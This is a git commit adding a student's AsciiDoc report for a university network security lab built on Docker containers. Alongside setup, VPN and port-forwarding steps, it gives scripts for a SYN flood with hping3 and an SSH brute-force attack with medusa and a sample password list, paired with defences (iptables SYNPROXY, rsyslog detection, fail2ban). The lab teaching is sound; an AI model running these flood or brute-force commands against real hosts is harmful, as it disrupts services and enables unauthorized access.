cse44742
/
Net-Sec-Lab-Project-Chrysoula-Koutkou-71344742
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity
Browse Source

project-sec.adoc

master
cse44742 4 years ago
parent
6d7a29dd8d
commit
581b4acb04
1 changed files with 732 additions and 0 deletions
Whitespace
Show all changes Ignore whitespace when comparing lines Ignore changes in amount of whitespace Ignore changes in whitespace at EOL
Split View
Diff Options
Show Stats Download Patch File Download Diff File
  1. 732
      project-sec.adoc

732
project-sec.adoc
View File

@ -0,0 +1,732 @@
= Εργασία Χειμερινού Εξαμήνου 2020-21
// Metadata:
:description: Intro and Install
:keywords: sec, swarm. docker
:data-uri:
:toc: right
:toc-title: Πίνακας περιεχομένων
:toclevels: 4
:source-highlighter: highlight
:icons: font
:sectnums:
Μάθημα: Ασφάλεια Δικτύων και Επικοινωνίων +
Ονοματεπώνυμο: Χρυσούλα Κούτκου +
Αριθμός Μητρώου: 71344742
{empty} +
== Docker Installation (Ubuntu)
```
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
sudo apt update
sudo apt install -y docker-ce
echo "or"
sudo apt install docker*
sudo systemctl status docker
sudo usermod -aG docker username #οπου username το όνομα του χρήστη που θα δουλεύει με docker
```
[[cheat-compose]]
== docker-compose
```
sudo curl -L "https://github.com/docker/compose/releases/download/1.24.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
sudo ln -s /usr/local/bin/docker-compose /usr/bin/docker-compose
```
[[cheat-error]]
== On Error:
- run
```
$ sudo su
# touch set-ca.sh
```
- copy-paste lines
```
registry_address=registry.vlabs.uniwa.gr
registry_port=5043
mkdir -p /etc/docker/certs.d/$registry_address:$registry_port
openssl s_client -showcerts -connect $registry_address:$registry_port < /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /etc/docker/certs.d/$registry_address:$registry_port/ca.crt
registry_port=5080
mkdir -p /etc/docker/certs.d/$registry_address:$registry_port
openssl s_client -showcerts -connect $registry_address:$registry_port < /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /etc/docker/certs.d/$registry_address:$registry_port/ca.crt
registry_address=hub.swarmlab.io
registry_port=5443
mkdir -p /etc/docker/certs.d/$registry_address:$registry_port
openssl s_client -showcerts -connect $registry_address:$registry_port < /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /etc/docker/certs.d/$registry_address:$registry_port/ca.crt
registry_port=5480
mkdir -p /etc/docker/certs.d/$registry_address:$registry_port
openssl s_client -showcerts -connect $registry_address:$registry_port < /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /etc/docker/certs.d/$registry_address:$registry_port/ca.crt
```
=== exec file
```
sudo bash ./set-ca.sh
```
{empty} +
== Install swarmlab-sec (Home PC)
- Clone repo https://git.swarmlab.io:3000/swarmlab/swarmlab-sec[^] +
== Usage (swarmlab-sec)
- Open a console
- cd to swarmlab-sec
- Create a directory
```
cd <dir>
../install/usr/share/swarmlab.io/sec/swarmlab-sec
create create project (swarmlab-sec create)
up start swarmlab-sec (swarmlab-sec up size=10)
scale resize swarmlab-sec (swarmlab-sec scale size=30)
reload rebuild image (swarmlab-sec reload size=15)
login login swarmlab-sec (swarmlab-sec login)
exec execute command (swarmlab-sec exec [SHELL COMMAND])
down stop swarmlab-sec (swarmlab-sec down)
clean clean project (swarmlab-sec clean)
list show instances (swarmlab-sec swarmlab-sec list)
help show help (swarmlab-sec help)
```
[[cheat-swarmlab-create]]
== Create swarmlab project
```
mkdir project
cd project
../install/usr/share/swarmlab.io/sec/swarmlab-sec create
```
.Relevant files:
```
Project
├── Dockerfile # Image specification
├── project # Sample program source code
│ └── hello_world.c
├── ssh # keys for accessing
│ ├── id_rsa # (could generate your own)
│ └── id_rsa.pub
├── docker-compose.yml # Container orchestration
```
[[cheat-swarmlab-up]]
== Spin up the swarmlab cluster
```
cd project
../install/usr/share/swarmlab.io/sec/swarmlab-sec up size=5
```
[[cheat-swarmlab-up1]]
== Login to the swarmlab cluster
```
cd project
../install/usr/share/swarmlab.io/sec/swarmlab-sec login
```
User password: docker
Sudo password: docker
== Inside on Docker Master
First of all, type ifconfig to see your ip address. Then, create an inventory.yml with the IPs using nmap -sP 172.19.0.* | grep Nmap | cut -d' ' -f5-6
```
[service]
172.27.0.2
172.27.0.3
172.27.0.4
172.27.0.5
172.27.0.6
```
Afterwards, you have to create a test.yml file.
```
---
- hosts: service
remote_user: docker
gather_facts: no
vars:
user: "docker"
tasks:
# -----------------
# make directory
# -----------------
- name: make dir for data
become: true
file:
path: "/var/lab/playground/playground-readmongo"
state: directory
owner: docker
group: docker
mode: '0777'
# - name: google.com
# become: yes
# become_user: "{{ user }}"
# command: curl http://www.google.com
# ignore_errors: yes
# register: configwww
#
# - name: ls configwww
# debug: var=configwww.stdout_lines
- name: ls -al /var/lab/playground/playground-readmongo/
become: yes
become_user: "{{ user }}"
#command: ls -al /var/lab/playground/playground-readmongo
command: ls -al /etc
ignore_errors: yes
register: config
- name: ls config
debug: var=config.stdout_lines
#
# - name: Refresh connection
# meta: clear_host_errors
```
Then, create a run.sh script.
```
ansible-playbook -u docker -i inventory.yml test.yml -f 5 --ask-pass --ask-become-pass
```
In your command line, type:
```
chmod +x run.sh
sudo apt install ansible
./run.sh
(Somewhere here there would be some errors)
sudo apt install sshpass
cd /etc/ansible
vi ansible.cfg
(Add this line)
host_key_checking = False
(Exit and return back)
./run.sh
```
== Hping3 Attack
{empty} +
Here is a video about hping3, tcpdump, netstat and iptables rules. Feel free to press like button and subscribe!
video::lErpyiAbsVs[youtube]
{empty} +
Firstly, connect to the worker that you wish to do the attack. Inside the worker create a script file with these:
```
#!/bin/sh
#installation_of_hping3
sudo apt update
sudo apt install hping3 -y
#syn_flood_attack_with_hping3_on_docker_master_with_IP_172.19.0.2
#hping3 -i u1 -S -p 80 172.27.0.2
#hping3 172.27.0.2 -q -n -d 120 -S -p 80 --flood
hping3 -S -p 80 172.127.0.2
```
In your command line type:
```
chmod +x hping3.sh
sudo ./hping3.sh
```
== Tcpdump on the victim
After connecting to the victim's host, then create a script file tcpdump.sh
```
#!/bin/sh
tcpdump port 80
#tcpdump -Nnn -i any -s0 'tcp[13] & 2 !=0'
```
In your command line type:
```
chmod +x tcpdump.sh
sudo ./tcpdump.sh
```
== Netstat on the victim
Create a netstat.sh script file and type the above:
```
#!/bin/sh
netstat -npt | awk '{print $6}' | sort | uniq -c | sort -nr | head
netstat -anp | grep 'tcp\udp' | awk '{print $6}' | cut -d: f1 | sort | uniq -c | sort -n
netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
netstat -na
netstat -tna
netstat -antlupe
netstat -n -p | grep SYN_REC | wc -l
netstat -npt | awk '{print $6}' | sort | uniq -c | sort -nr | head
```
In your command line type:
```
chmod +x netstat.sh
sudo ./netstat.sh
```
== Anti-Ddos protection using iptables
Create an anti-ddos.sh file and type inside:
```
#!/bin/sh
#drop invalid packets
iptables -A INPUT -m state --state INVALID -j DROP
iptables -A FORWARD -m state --state INVALID -j DROP
iptables -A OUTPUT -m state --state INVALID -j DROP
#Use SYNPROXY on all ports (disables connection limiting rule) ###
iptables -t raw -A PREROUTING -p tcp -m tcp --syn -j CT --notrack
iptables -A INPUT -p tcp -m tcp -m conntrack --ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7 --mss 1460
iptables -A INPUT -m conntrack --ctstate INVALID -j DROP
```
In your command line type:
```
chmod +x anti-ddos.sh
sudo ./anti-ddos.sh
```
== SSH Brute Force Attack using Medusa
{empty} +
Here is a video about ssh brute force attack using medusa tool, detection using rsyslog and protection using fail2ban
video::6C8suUjJBCA[youtube]
{empty} +
In order to do this attack, you have to create a password list file. For example,
```
123password
root
admin-root
acbdef2147
whatistherealpassword
docker
password
123456789
```
The next step is to create a medusa.sh script file.
```
#!/bin/bash
sudo apt update
sudo apt install medusa
medusa -u docker -P pass.txt -h 172.27.0.3 -M ssh
```
To accomplish the ssh brute force attack I connected as worker_4 and I will attack the worker_1.
In your command line type:
```
chmod +x medusa.sh
sudo ./medusa.sh
```
== Detection of SSH Brute Force using rsyslog tool
I will connect as worker_1 and I will create a rsyslog.sh file.
```
#!/bin/bash
sudo apt update
sudo apt install rsyslog
sudo service rsyslog start
sudo service rsyslog status
sudo grep "Failed password" /var/log/auth.log
```
In your command line type:
```
chmod +x rsyslog.sh
sudo ./rsyslog.sh
(After results are shown type the next line)
sudo service rsyslog stop
```
== Fail2ban tool for SSH protection
Create a fail2ban.sh file and type the below:
```
#!/bin/bash
sudo apt update
sudo apt install fail2ban
```
In your command line type:
```
chmod +x fail2ban.sh
sudo ./fail2ban.sh
```
```
sudo service fail2ban start
sudo service fail2ban status
cd /etc/fail2ban
cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
(Inside the jail.local type the below)
[DEFAULT]
loglevel = DEBUG
logtarget = path_to_log
[sshd]
enabled = true
maxretry = 2
bantime = 600
findtime = 30
logpath = %(sshd_log)s
backend = %(sshd_backend)s
action = iptables-multiport[name=%(__name__)s, bantime="%(bantime)s, port=ssh, protocol="%(protocol)s", chain=INPUT]
```
In your command line type:`
```
sudo service fail2ban restart
sudo service fail2ban status
sudo fail2ban-client start
sudo fail2ban-client status
sudo fail2ban-client status sshd
```
== SSH Brute authentication only with keys
To accomplish this brute force login with only key you have to connect to a container, for instance I connected to worker_5.
In your command line type:`
```
(Our server is worker_5)
mkdir .ssh
cd .ssh
ssh-keygen
cat ~/.ssh/id_rsa.pub
(You should do the below for every worker, but for this example I will do only about worker_4)
ssh-copy-id docker@172.27.0.5
(Then it will ask you to connect)
ssh docker@172.27.0.5
(After doing this to all remaining containers type the next below for each host)
scp id_rsa docker@172.27.0.5 #copy id_rsa to every container
sudo service ssh restart
```
Then you have to disable password authentication on you server.
```
(Being on server)
cd /etc/ssh
vi sshd_config
(Inside sshd_config change the below)
PasswordAuthentication no
(After doing this return to your command line and type the below)
sudo service ssh restart
```
And finally you are ready!
== VPN
{empty} +
Here is a video about how you can create VPN and provide services to docker swarm.
video::FnRMonM07yQ[youtube]
{empty} +
In this part, I will show you how you can create a VPN and and provide services to the docker swarm. Firstly, you shoudld be on the /swarmlab-sec/project folder and create a vpn folder.
```
cd swarmlab-sec/project
mkdir vpn
cd vpn
```
The next step is to create a create-vpn. script.
```
#!/bin/bash
IP=127.0.0.1 # Server IP
P=1194 # Server Port
OVPN_SERVER='10.80.0.0/16' # VPN Network
#vpn_data=/var/lib/swarmlab/openvpn/openvpn-services/ # Dir to save data ** this must exist **
vpn_data=$PWD/openvpn-services/
if [ ! -d $vpn_data ]; then
mkdir -p $vpn_data
fi
NAME=swarmlab-vpn-services # name of docker service
DOCKERnetwork=swarmlab-vpn-services-network # docker network
docker=registry.vlabs.uniwa.gr:5080/myownvpn # docker image
docker stop $NAME #stop container
sleep 1
docker container rm $NAME #rm container
# rm config files
rm -f $vpn_data/openvpn.conf.*.bak
rm -f $vpn_data/openvpn.conf
rm -f $vpn_data/ovpn_env.sh.*.bak
rm -f $vpn_data/ovpn_env.sh
# create network
sleep 1
docker network create --attachable=true --driver=bridge --subnet=172.50.0.0/16 --gateway=172.50.0.1 $DOCKERnetwork
#run container see ovpn_genconfig
docker run --net=none -it -v $vpn_data:/etc/openvpn -p 1194:1194 --rm $docker ovpn_genconfig -u udp://$IP:1194 \
-N -d -c -p "route 172.50.20.0 255.255.255.0" -e "topology subnet" -s $OVPN_SERVER
# create pki see ovpn_initpki
docker run --net=none -v $vpn_data:/etc/openvpn --rm -it $docker ovpn_initpki
# see ovpn_copy_server_files
#docker run --net=none -v $vpn_data:/etc/openvpn --rm $docker ovpn_copy_server_files
#create vpn see --cap-add=NET_ADMIN
sleep 1
docker run --detach --name $NAME -v $vpn_data:/etc/openvpn --net=$DOCKERnetwork --ip=172.50.0.2 -p $P:1194/udp --cap-add=NET_ADMIN $docker
sudo sysctl -w net.ipv4.ip_forward=1
#show created
docker ps
```
create-user.sh
```
USERNAME=user1
vpn_data=$PWD/openvpn-services/
docker=registry.vlabs.uniwa.gr:5080/myownvpn
docker run -v $vpn_data:/etc/openvpn --rm -it $docker easyrsa build-client-full $USERNAME nopass
docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm $docker ovpn_getclient $USERNAME > $USERNAME.user
```
After the user is created add in the $USERNAME.user the below:
```
client
nobind
dev tun
comp-lzo
resolv-retry infinite
keepalive 15 60
remote-cert-tls server
remote 10.0.2.15 1194 udp #type your host IP address in every $USERNAME.user
float
```
rm-user.sh
```
#!/bin/bash
CLIENTNAME=test1
U=$CLIENTNAME
vpn_data=$PWD/openvpn-services/
docker=registry.vlabs.uniwa.gr:5080/myownvpn
rm -f $vpn_data/pki/reqs/$CLIENTNAME.req
rm -f $vpn_data/pki/private/$CLIENTNAME.key
rm -f $vpn_data/pki/issued/$CLIENTNAME.crt
rm -f $vpn_data/server/ccd/$CLIENTNAME
rm -f $vpn_data/ccd/$CLIENTNAME
pem=$(sudo grep "CN=$U$" $vpn_data/pki/index.txt | cut -f4)
rm -f $vpn_data/pki/certs_by_serial/$pem.pem
sed -i "/CN=$U$/d" $vpn_data/pki/index.txt
echo $pem
docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm -it $docker ovpn_revokeclient $CLIENTNAME remove
rm -f $vpn_data_user_config/$CLIENTNAME.ovpn
rm -f $vpn_data_user_config1/$CLIENTNAME.ovpn
```
show-user.sh
```
NAME=swarmlab-vpn-services # name of docker service
docker exec -it $NAME ovpn_listclients
```
show-conn-user.sh
```
NAME=swarmlab-vpn-services # name of docker service
docker exec -it $NAME cat /tmp/openvpn-status.log
```
Then you have to type in your command line:
```
chmod +x create-vpn.sh
chmod +x create-user.sh
chmod +x show-user.sh
chmod +x rm-user.sh
chmod +x show-conn-user.sh
./create-vpn.sh
./create-user.sh #for every user you have to use a different name
./show-user.sh #you can see all the users
./show-conn-user.sh #you can see all connected users to the vpn
cp $USERNAME.user ../project #this user will be copied to the master
```
After doing these steps, connect to a docker host, for instance in docker master.
```
sudo apt update
sudo apt install openvpn
ls -al #to check if there is the user1.user file
sudo su
service openvpn start
openvpn --config ./user1.user #client connection to the VPN
```
Don't close the window or do not stop the execution. Open a new window and connect to the same user and type ifconfig to check if the tun0 has created.
Now connect to an other worker, for instance worker_1. You have to do the same thing in every worker.
```
ssh docker@@172.27.0.3
sudo apt update
sudo apt install openvpn
touch user2.user
vi user2.user #copy the user2.user file from the /swarmlab-sec/project/vpn/ and paste it here
ls -al #to check if there is the user1.user file
sudo su
service openvpn start
openvpn --config ./user2.user #client connection to the VPN
```
You have to do the same procedure for the other workers.
Don't close the window or do not stop the execution. Open a new window and connect to the same user and type ifconfig to check if the tun0 has created.
Then in docker master tab type:
```
sudo su
tcpdump -i tun0
```
Go to the new docker worker tab and type:
```
ping 10.80.0.2 #this is the new IP of master of tun0
```
You are ready!
== VPN
{empty} +
Here is a video about how you can do ssh local and remote forwarding.
video::gbegXj8pQxs[youtube]
{empty} +
On remote container
```
sudo apt install nginx
curl localhost #to check if localhost is working
hostname -i
```
On localhost host
```
curl localhost #to check if localhost is working
hostname
hostname -i
sudo ssh -nNT -L 80:localhost:80 docker@172.27.0.2
```
Then type on localhost host again in a new tab:
```
curl localhost #to check if localhost is working
```
And it works! +
Please enjoy and thank you for reading my ascii doc and watching my youtube videos!
Write Preview
Loading…
Cancel
Save